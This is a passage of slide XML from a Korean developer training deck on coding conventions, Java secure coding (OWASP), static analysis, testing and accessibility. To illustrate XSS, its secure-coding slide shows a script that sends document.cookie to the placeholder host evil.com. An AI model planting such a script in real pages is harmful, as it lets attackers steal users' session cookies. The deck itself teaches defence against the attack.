              <a:solidFill>
                <a:srgbClr val="538CD5"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFE6D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FE6D8"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>        doSomething();</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="538CD5"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFE6D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5400" marR="254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538CD5"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFE6D8"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>} catch (Exception e) {}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2. 자바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43" name="Google Shape;743;p98"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="1536632"/>
            <a:ext cx="8175075" cy="480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latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>접근자 순서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596900" marR="1016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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FAFAFA"/>
                </a:highlight>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>public protected private abstract default static final transient volatile synchronized native strictfp</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFAFA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14400" marR="1016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rgbClr val="009900"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FAFAFA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long 타입은 숫자 마지막에 대문자 L 표시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패키지명은 모두 소문자, 밑줄문자(_) 사용 안 함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클래스명은 파스칼표기법 PascalCase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클래스명은 명사 또는 명사구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인터페이스명은 명사 또는 명사구이지만, 가끔 형용사 사용(예 Readable)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메소드명은 낙타표기법 lowerCamelCase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상수명은 대문자 뱀 표기법 UPPER_SNAKE_CASE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비상수 필드명, 파라미터명, 로컬 변수명은 모두 lowerCamelCase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파라미터명은 2바이트 이상 유의미하게 선언</a:t>
            </a:r>
            <a:endParaRPr sz="16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3. JavaScript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49" name="Google Shape;749;p99"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1657351"/>
            <a:ext cx="8146500" cy="165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예) =&gt;(Arrow Function), ``(Template Literal), ...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https://google.github.io/styleguide/jsguide.html</a:t>
            </a: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u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5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https://www.crockford.com/code.html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50" name="Google Shape;750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5898" y="3448755"/>
            <a:ext cx="3476625" cy="296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461" y="3448755"/>
            <a:ext cx="4243027" cy="215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3. JavaScript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7" name="Google Shape;757;p100"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876300" y="1536633"/>
            <a:ext cx="795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파일명 : 모두 소문자, 밑줄문자(_) 또는 하이픈(-).js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파일인코딩 : UTF-8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공백 : 스페이스(ASCII 0x20), 탭은 사용하지 않음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블록 들여쓰기 : 2+ 스페이스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if, else, for, do, while 명령 뒤에는 반드시 중괄호 표시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Kernighan and Ritchie style 중괄호 표시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40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여는 중괄호 앞에 줄바꿈 없음.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40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여는 중괄호 다음은 줄바꿈 있음.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4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닫는 중괄호 앞에 줄바꿈 있음.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○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>닫는 중괄호 다음에 줄바꿈 있음.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Dotum"/>
              <a:ea typeface="Dotum"/>
              <a:cs typeface="Dotum"/>
              <a:sym typeface="Dotum"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="908050" marR="215900" lvl="1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None/>
            </a:pPr>
            <a:endParaRPr sz="140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===, !== 사용 할 것.   ==, != 는 사용하지 말 것.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eval</a:t>
            </a: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 사용하지 말 것.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4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문자열은 홑따옴표(')를 사용할 것.</a:t>
            </a:r>
            <a:endParaRPr sz="14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4. HTML/CSS/XML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63" name="Google Shape;763;p101"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1536633"/>
            <a:ext cx="8108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Google HTML/CSS Style Guide : </a:t>
            </a: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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1800" u="sng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https://google.github.io/styleguide/htmlcssguide.html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2857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공통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가능하면 HTTPS 명시해서 사용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들여쓰기는 2 스페이스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태그, 속성, 속성 값 모두 소문자 사용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라인 끝의 공백 제거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인코딩 UTF-8 &lt;meta charset="utf-8"&gt; 명시</a:t>
            </a:r>
            <a:endParaRPr sz="14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4. HTML/CSS/XML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69" name="Google Shape;769;p102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752475" y="1536633"/>
            <a:ext cx="5295900" cy="31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HTML 스타일 가이드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HTML5 사용 &lt;!DOCTYPE html&gt;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HTML 검증기 확인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https://validator.w3.org/nu/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태그는 반드시 닫기 &lt;br&gt; 제외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멀티미디어는 alt 속성 사용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&lt;link&gt;, &lt;script&gt; 태그에 type 속성 제거</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2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속성 인용부호는 겹따옴표 "" 사용, 홑따옴표는 '' 제외</a:t>
            </a:r>
            <a:endParaRPr sz="14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4. HTML/CSS/XML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75" name="Google Shape;775;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1536633"/>
            <a:ext cx="7994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800" b="1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CSS 스타일 가이드#</a:t>
            </a:r>
            <a:endParaRPr/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CSS 검증기 확인</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="91440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400">
                <a:solidFill>
                  <a:srgbClr val="538CD5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https://jigsaw.w3.org/css-validator/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="3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의미있거나 일반적인 ID와 클래스명 사용</a:t>
            </a:r>
            <a:endParaRPr/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가능하면 짧게 하지만 너무 축약하지는 말 것</a:t>
            </a:r>
            <a:endParaRPr/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아이디와 클래스 앞에 태그 붙이지 말 것</a:t>
            </a:r>
            <a:endParaRPr/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가능하면 단축 프로퍼티 사용</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="91440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400">
                <a:solidFill>
                  <a:srgbClr val="FF000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padding-top -&gt; padding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="3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ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF000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0.8em</a:t>
            </a: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 일 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF000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.8em </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="14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으로 앞 0 제거</a:t>
            </a:r>
            <a:endParaRPr sz="14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4. HTML/CSS/XML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81" name="Google Shape;781;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790574" y="1536633"/>
            <a:ext cx="8041725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가능하면 컬러 코드는 3자리로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#eebbcc</a:t>
            </a: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-&gt; </a:t>
            </a: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#ebc</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F7F7F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아이디와 클래스명은 하이픈 사용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.error_status</a:t>
            </a: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-&gt; </a:t>
            </a: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.error-status</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F7F7F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가능하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="18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css hack</a:t>
            </a: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사용하지 말 것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프로퍼티는 알파벳 순서로 정렬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모든 프로퍼티 선언 마지막은 세미콜론</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="18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;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F7F7F9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프로퍼티명 콜론 뒤는 항상 1 스페이스</a:t>
            </a:r>
            <a:b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lang="ko-KR" sz="18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font-weight:bold;</a:t>
            </a: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-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="18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font-weight: bold;</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1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4. HTML/CSS 코딩 컨벤션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87" name="Google Shape;787;p105"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="1536633"/>
            <a:ext cx="8165549" cy="399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01600" lvl="0" indent="-342900" algn="l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선택자는 한 줄에 하나씩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2286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2286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2286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2286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인용부호는 홑따옴표</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F7F7F9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''</a:t>
            </a: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사용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171450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="16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</a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="202020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88" name="Google Shape;788;p105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743075" y="2628899"/>
            <a:ext cx="3265638" cy="100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a:focus,</a:t>
            </a:r>
            <a:b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a:active {</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none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 position: relative; top: 1px;</a:t>
            </a:r>
            <a:b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-KR" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none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네이버 클라우드 플랫폼 API 연동 사례</a:t>
            </a:r>
            <a:endParaRPr sz="28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2400"/>
              <a:t>네이버 로그인 적용 사례</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314323" y="6345017"/>
            <a:ext cx="87344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https://developers.naver.com/products/login/bestpractice/bestpractice.md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03" y="2800350"/>
            <a:ext cx="6730666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5. 자바 보안 코딩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94" name="Google Shape;794;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="733424" y="1536633"/>
            <a:ext cx="8098875" cy="223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OWASP 기준의 SQL Injection, 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XSS 등의 보안 위협에 대응하는 안전한 자바 코딩 가이드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OWASP TOP 10 - 2017</a:t>
            </a:r>
            <a:endParaRPr sz="1800" u="sng">
              <a:solidFill>
                <a:schemeClr val="hlink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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="16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https://owasp.org/www-pdf-archive/OWASP_Top_10-2017-ko.pdf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95" name="Google Shape;795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2550" y="3700463"/>
            <a:ext cx="6400800" cy="238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5. 자바 보안 코딩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1" name="Google Shape;801;p107"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619125" y="1536633"/>
            <a:ext cx="8213175" cy="500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SQL Injection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preparedStatement 사용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동적 SQL을 만들 경우 반드시 입력값 필터링 필요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MyBatis는 </a:t>
            </a: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Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>#{}</a:t>
            </a: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 사용 필수, </a:t>
            </a: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Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>${}</a:t>
            </a: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는 입력값 필터링 필요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Cross Site Scripting(XSS)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사용자가 입력한 악의적 스크립트 실행 방어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HTML 출력 전에 필터링 필요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Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>&lt;script&gt;url="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F7F7F9"/>
                </a:highlight>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evil.com/attack.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="DD1144"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F7F7F9"/>
                </a:highlight>
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>?" + document.cookie&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="DD1144"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F7F7F9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위험한 형식 파일 업로드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사용자가 업로드한 파일은 실행되지 않게 조치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크로스사이트 요청 위조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CSRF 방어 코드로 폼 값의 변조 방지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18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입력값 변조</a:t>
            </a:r>
            <a:endParaRPr sz="18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쿠키 등은 사용자가 변조할 수 있기 때문에 이에 대한 검증 필요</a:t>
            </a:r>
            <a:endParaRPr sz="11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1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세션 활용해서 사용자별 정보 사용</a:t>
            </a:r>
            <a:endParaRPr sz="18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5. 자바 보안 코딩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7" name="Google Shape;807;p108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1536633"/>
            <a:ext cx="8251275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20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취약한 암호화 알고리즘</a:t>
            </a:r>
            <a:endParaRPr sz="20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2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암호화에 RC2, RC4, RC5, RC6, MD4, MD5, SHA1, DES 알고리즘 사용금지</a:t>
            </a:r>
            <a:endParaRPr sz="12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20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사용자 중요정보 평문 저장, 전송</a:t>
            </a:r>
            <a:endParaRPr sz="20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2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DB에 암호화해서 저장</a:t>
            </a:r>
            <a:endParaRPr sz="12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2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전송 구간 암호화 기반에 가능하면 암복호화 가능하게 변경 후 전송</a:t>
            </a:r>
            <a:endParaRPr sz="12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20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하드코딩된 패스워드, 암호화 키</a:t>
            </a:r>
            <a:endParaRPr sz="20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2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환경변수 등으로 패스워드를 가져와서 활용</a:t>
            </a:r>
            <a:endParaRPr sz="12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●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="20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파라미터 변조</a:t>
            </a:r>
            <a:endParaRPr sz="20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742950" lvl="1" indent="-1714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800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="202020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파라미터 값을 변조해서 다른 사용자의 정보 조회 방지</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="202020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6. API URL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13" name="Google Shape;813;p109"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="752476" y="1536633"/>
            <a:ext cx="7734299" cy="351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REST API 주소 작성에 관련된 가이드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https://restfulapi.net/resource-naming/</a:t>
            </a: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명사 또는 명사형 단어 사용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일관성 중요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URI에 CRUD 함수명 사용 금지</a:t>
            </a:r>
            <a:endParaRPr sz="16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 sz="1600">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>URI 배열 필터에 쿼리스트링 사용</a:t>
            </a:r>
            <a:endParaRPr sz="16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6. API URL 가이드</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="819" name="Google Shape;819;p110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1536633"/>
            <a:ext cx="80703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800">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>명사나 명사구를 사용해서 리소스 표시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document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collection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store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controller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800">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>일관성 중요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Use forward slash (/) to indicate a hierarchical relationships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Do not use trailing forward slash (/) in URIs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Use hyphens (-) to improve the readability of URIs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Do not use underscores ( _ )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Use lowercase letters in URIs</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Dotum"/>
              <a:ea typeface="Dotum"/>
              <a:cs typeface="Dotum"/>
              <a:sym typeface="Dotum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-KR" sz="1200">
                <a:latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>Do not use file extensions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latin typeface="Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>URI에 CRUD 함수명(get, post, update, delete) 사용 금지</a:t>
            </a:r>
            <a:endParaRPr sz="1800"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Dotum"/>
                <a:ea typeface="Dotum"/>
                <a:cs typeface="Dotum"/>
                <a:sym typeface="Dotum"/>
              </a:rPr>
              <a:t>URI 필터링에 querystring 사용</a:t>
            </a:r>
            <a:endParaRPr sz="18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7. 정적 분석 방법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25" name="Google Shape;825;p111"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="1619250"/>
            <a:ext cx="8251275" cy="204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Checkstyle, PMD, Findbugs 도구를 이용해서 코드의 품질을 관리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개발자는 IDE에서 자기가 개발한 코드를 개별적으로 검사하고 커밋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CI/CD 에서 주기적(일별, 커밋별) QA를 진행하여 개발팀 전체에 공유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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="826" name="Google Shape;826;p111"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="742950" y="3680284"/>
          <a:ext cx="7658100" cy="1982350"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{1D365274-C570-4AF8-8829-3F33A80F814F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1313225"/>
                <a:gridCol w="5146150"/>
                <a:gridCol w="1198725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PMD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소스 코드를 스캔하고 잠재적인 문제, 가능한 버그, 사용되지 않은 코드 및 최적화되지 않은 코드, 지나치게 복잡한 표현식 및 중복 코드를 표시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로컬 검사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FindBugs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PMD와 매우 유사한 또 다른 정적 코드 분석기.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PMD와의 가장 큰 차이점은 FindBugs는 바이트 코드에서 작동하지만 PMD는 소스 코드에서 작동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로컬 검사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Checkstyle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코딩 스타일 및 규칙을 분석하기 위한 도구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로컬 검사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SonarQube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PMD, FindBugs 및 Checkstyle을 하나의 패키지로 포장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2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CI 서버 검사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8. 테스트케이스 작성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2" name="Google Shape;832;p11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000">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>테스트케이스를 이용해서 변경에 대한 코드의 품질을 관리합니다.</a:t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1단계는 간단한 Function만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2단계는 MockMVC 사용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2000">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>UI 테스트는 제외합니다. </a:t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애플리케이션 변경에 따라 테스트케이스 변경 범위가 매우 커서 유지가 어렵기 때문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8. 테스트케이스 작성 가이드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8" name="Google Shape;838;p1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자바 테스트 케이스 파일은 대상 클래스 이름에 Test를 뒤에 붙입니다.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파일은 운영에 배포되지 않는 src/test/java 아래 위치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메소드에 @Test 어노테이션(JUnit 4.x)을 붙여서 테스트 케이스 추가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assertEquals(기대값, 함수(입력값)); 형태로 테스트 작성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@RunWith(</a:t>
            </a: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SpringJUnit4ClassRunner</a:t>
            </a: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.class) 사용해서 스프링 Bean 테스트(2단계)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JS는 jest 프레임워크를 사용하고 파일명은 대상 파일명_test.js 로 합니다.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Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>파일은 tests/ 폴더 아래 위치합니다.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9. 프로젝트 디렉토리 구성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4" name="Google Shape;844;p11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800">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>프로젝트의 기본 구조는 Maven 스타일에 준합니다.</a:t>
            </a:r>
            <a:endParaRPr sz="2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프로젝트명/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├─src/        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웹 애플리케이션 위치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├─main/    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운영 배포용 파일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├─java/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java 파일 package root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│  └─com/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패키지별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├─resources/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환경 설정 파일 기준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└─webapp/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웹 root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    └─WEB-INF/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web.xml 기준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│           └─jsp/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JSP 파일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└─test/    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테스트 케이스 파일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    ├─java/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test java 파일 기준 폴더 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    │  └─com/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패키지별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│      └─resources/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테스트용 환경 설정 파일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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>└─target/              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="538CD5"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># maven 빌드 시 생성 폴더</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="538CD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10. 용어집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50" name="Google Shape;850;p11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400">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>“상품” 단어를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2400" b="1">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>Product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2400">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E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Goods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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중에서 어느 것으로 표현할 것인가 고민을 줄여주는 용도.</a:t>
            </a:r>
            <a:endParaRPr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구글 로그인 연동하기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https://help.sixshop.com/learn-sixshop/store-manager/add-ons/social-login/googlelogin</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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3129" y="3124199"/>
            <a:ext cx="5977372" cy="33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11. 웹 접근성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56" name="Google Shape;856;p116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311699" y="1536633"/>
            <a:ext cx="8613225" cy="252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효과적인 대체 텍스트를 작성하기 위한 팁</a:t>
            </a:r>
            <a:endParaRPr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6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대체 텍스트는 이미지의 의도, 목적 및 의미를 제공해야 함</a:t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600">
                <a:latin typeface="Nanum Gothic Coding"/>
                <a:ea typeface="Nanum Gothic Coding"/>
                <a:cs typeface="Nanum Gothic Coding"/>
                <a:sym typeface="Nanum Gothic Coding"/>
              </a:rPr>
              <a:t>시각 장애인은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" sz="16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비장애인이 이미지로 얻는 것만큼 많은 텍스트에서 많은 정보를 얻어야 함.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-KR" sz="16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"chart", "image"또는 "diagram"과 같은 특정하기 힘든 보편적인 단어는 피할 것</a:t>
            </a:r>
            <a:endParaRPr sz="16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57" name="Google Shape;857;p116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209550" y="6488668"/>
            <a:ext cx="862012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https://docs.google.com/presentation/d/1i58QnsAV-5Cy8dolI6lpGUcI0sEYvcVsB54WK2vSWhw/edit#slide=id.g6f5ca1b7f0_0_17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43c8bf3e09_0_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863" name="Google Shape;863;g143c8bf3e09_0_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피드백 및 수정 진행</a:t>
            </a:r>
            <a:endParaRPr sz="2500"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3873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조별 파이널 프로젝트 진행</a:t>
            </a:r>
            <a:endParaRPr sz="21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2464526"/>
            <a:ext cx="8229600" cy="2168434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dirty="0"/>
              <a:t>교육이란 사실을 가르치는 것이 아니라</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>생각할 수 있는 힘을 기르는 것이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
